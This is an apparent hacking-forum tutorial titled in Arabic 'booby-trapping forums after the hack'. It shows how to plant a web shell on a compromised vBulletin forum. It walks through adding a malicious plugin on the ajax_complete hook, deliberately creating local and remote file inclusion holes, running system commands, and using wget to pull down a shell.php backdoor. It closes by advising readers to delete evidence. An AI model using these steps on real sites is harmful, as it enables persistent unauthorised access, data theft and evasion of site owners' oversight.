تلغيم المنتديات بعد الاختراق - 💀 𝒸ʸ𝐛ᵉℝ-匚𝑜𝐝€ＲＣ๏𝕞𝕞𝓤ｎᎥᵗＹ💀

Members Login

Post Info TOPIC: تلغيم المنتديات بعد الاختراق

cYber-coder

Senior Member

Status: Offline

Posts: 319

Date: Feb 14, 2013

تلغيم المنتديات بعد الاختراق	Permalink Closed

Hey guys, today I'm gonna be showing you how to get your shell uploaded on vBulletin forums. Once you have admin access (not sure about Founder), log into your admin panel. Usually it's something like this.. Code: `http://www.site.com/forum/admincp/` If it's not, try /admin. Once you're logged in, you should be presented with the oh so mighty vBulletin Admin Control Panel.. Spoiler (Click to Hide) Now on the left, click plugins and products, and click on Add New Plugin. Spoiler (Click to Hide) It should take you to something that looks like this. Spoiler (Click to Hide) Product:vBulletin. Hook Location: We're going to be executing remote code through the ajax plugin, so under Hook Location, click ajax_complete. Title: .....whatever you want to name it. Plugin PHP Code: This is where your code is going. First we want to check the disabled functions on the server. Let's see if we can get this PHP Info to show up... Plugin is active: No Code: `phpinfo();` It should all look like this once you're done.. Spoiler (Click to View) Now it should redirect you back to the plugins manager. If there's any plugins active under the ajax plugin, uncheck them and make sure yours is active. Scroll down and click "Save Active Status". Should look something like this... Spoiler (Click to View) Now save it, and go to your ajax page. Code: `http://www.site.com/forum/ajax.php` Spoiler (Click to View) Local File Inlcusion allow_url_fopen = On That means we can create a Local File Inclusion vulnerability. Code: `include($_GET[LFI])` Spoiler (Click to View) Code: `http://www.site.com/forum/ajax.php?LFI=/proc/self/status` Spoiler (Click to View) Now you can poison logs, dig up juicy files, or use another method of LFI to get your shell up. Remote File Inclusion allow_url_include = Off That means we can't create an RFI vulnerability until we get our shell up.. If we could, it would be almost the same thing as LFI. Code: `include($_GET[RFI])` Code: `http://www.site.com/forum/ajax.php?RFI=http://www.site.com/shell.txt?` Remote Code Execution Now, if any of these are disabled, you're going to have some trouble. If not, we can get our shell up using unix commands. Code: `system exec shell_exec passthru` Code: `system('ls');` That's a unix commands to list files, now see if it worked.. Code: `http://www.site.com/forum/ajax.php` You should see all the files in the current directory. Woot, site pwnt. Now you can use wget to get your shell uploaded.. Code: `system('wget http://www.site.com/shell.txt -O shell.php');` Spoiler (Click to View) Code: `http://www.site.com/forum/shell.php` Spoiler (Click to View) Game, there you go. Now you can activate the default plugin and delete your evidence. Shoutout to the rest of Team Intra and my boys in Zer0Lulz for making this possible. __________________

Page 1 of 1 sorted by

Tweet this page

Post to Digg

Post to Del.icio.us

Create your own FREE Forum
Report Abuse